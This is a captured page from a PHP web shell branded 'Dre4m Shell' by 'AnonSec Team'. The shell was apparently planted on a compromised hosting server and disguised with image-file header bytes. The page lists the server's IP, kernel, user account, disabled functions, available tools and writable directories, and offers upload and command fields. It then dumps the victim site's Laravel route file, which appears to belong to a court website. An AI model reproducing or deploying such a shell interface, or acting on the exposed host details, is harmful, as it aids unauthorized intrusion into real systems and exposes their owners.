ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.144.89.156
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/nicnUpgrade/routes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/nicnUpgrade/routes/web.php
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::get('/', 										'HomeController@Home');
//Route::get('/homepage', 										'HomeController@HomePage');
Route::get('/judicial-cadre', 							'CadreController@Home');
Route::get('/judicial-cadre/{id?}', 					'CadreController@profile');
Route::get('/department', 								'DepartmentController@Home');
Route::get('/vision', 									'VisionController@Home');
Route::get('/history', 									'HistoryController@Home');
Route::get('/more-history', 							'HistoryController@More_History');
Route::get('/jurisdiction-and-power', 					'JurisdictionPowerController@Home');
Route::get('/contributors', 							'ContributorController@Home');
Route::get('/profile', 									'ContributorController@Profile');
Route::post('/causelist', 								'CauselistController@Home');
Route::get('/causelist', 								'CauselistController@Search');
Route::get('/brochures', 								'BrochureController@Home');
Route::get('/court-division', 							'CourtDivisionController@Home');
Route::get('/court-registry', 							'CourtRegistryController@Home');
Route::get('/file-case', 								'FileCaseController@Home');
Route::get('/download', 								'DownloadController@Home');
Route::get('/publications',		 						'PublicationController@Home');
Route::get('/watching-Videos',		 					'VideoController@Home');
Route::get('/speeches-papers',		 					'SpeechesController@Home');
Route::get('/archives',		 							'ArchiveController@Home');
Route::get('/our-services',		 						'ServicesController@Home');
Route::get('/faq',		 								'FaqController@Home');
Route::get('/gallery',		 							'GalleryController@Home');
Route::get('/gallery-details/{id?}',		 			'GalleryController@GroupDetails');
Route::get('/past-future',		 						'nicnPastFutureController@Home'); 
Route::get('/judgment',		 							'JudgmentController@Home');
Route::get('/Administrative/staff',		 				'AdministrativeController@Home');
//News and Presss/Publication
Route::get('/news-update',		 						'NewsEventController@Home');
Route::get('/press-release', 							'PressReleaseController@view');
Route::get('/news-and-events', 							'NewsEventController@Home');
Route::get('/{id?}/news-details', 						'NewsEventController@details');
//flash news details
Route::get('flash-news-details/{id?}', 						'NewsEventController@flashNewsDeatils');

//ADR
Route::get('/adr-center', 						        'AdrController@Home');
Route::get('/adr-profile', 						        'AdrController@profile');
Route::get('/adr-contact', 						        'AdrController@contact');
//
Route::get('/adr-portal', 								'AdrController@adrPortal');
Route::get('/portal/adr-about', 						'AdrController@adrAbout');
Route::get('/portal/adr-profile', 						'AdrController@adrProfile');
Route::get('/portal/adr-contact-us', 					'AdrController@adrContact');
//


//Route::get('/past-judges', 								'PastJudgesController@Home');
Route::get('/past-judges', 						        'CadreController@PastJudges');
Route::get('/past-presidents', 						    'CadreController@PastPresident');
Route::get('/past-chief-registrar',   		            'AdministrativeController@PastChiefRegistrar');
Route::get('/nicn-forms',  							'nicnFormController@Home');
//contact us
Route::get('/contact-us',   		            		'ContactController@create');
Route::post('/contact-us',   		            		'ContactController@store');
//
Route::get('/third-alteration-forms',   		         'ThirdAlterationFormController@create');
Route::get('/test', 						'TestHomeController@Home');

//load judgement
Route::get('/judgement',   		                 'JudgmentController@loadJudgement')->name('judgement');
Route::get('/view-judgment/{id}',   		     'JudgmentController@viewJudgement'); //view judgment

//Live Video and Live Streaming
Route::get('/nicn-live-streaming-event',   		 'VideoController@createLiveStreaming')->name('liveStreaming');





Anon7 - 2022
AnonSec Team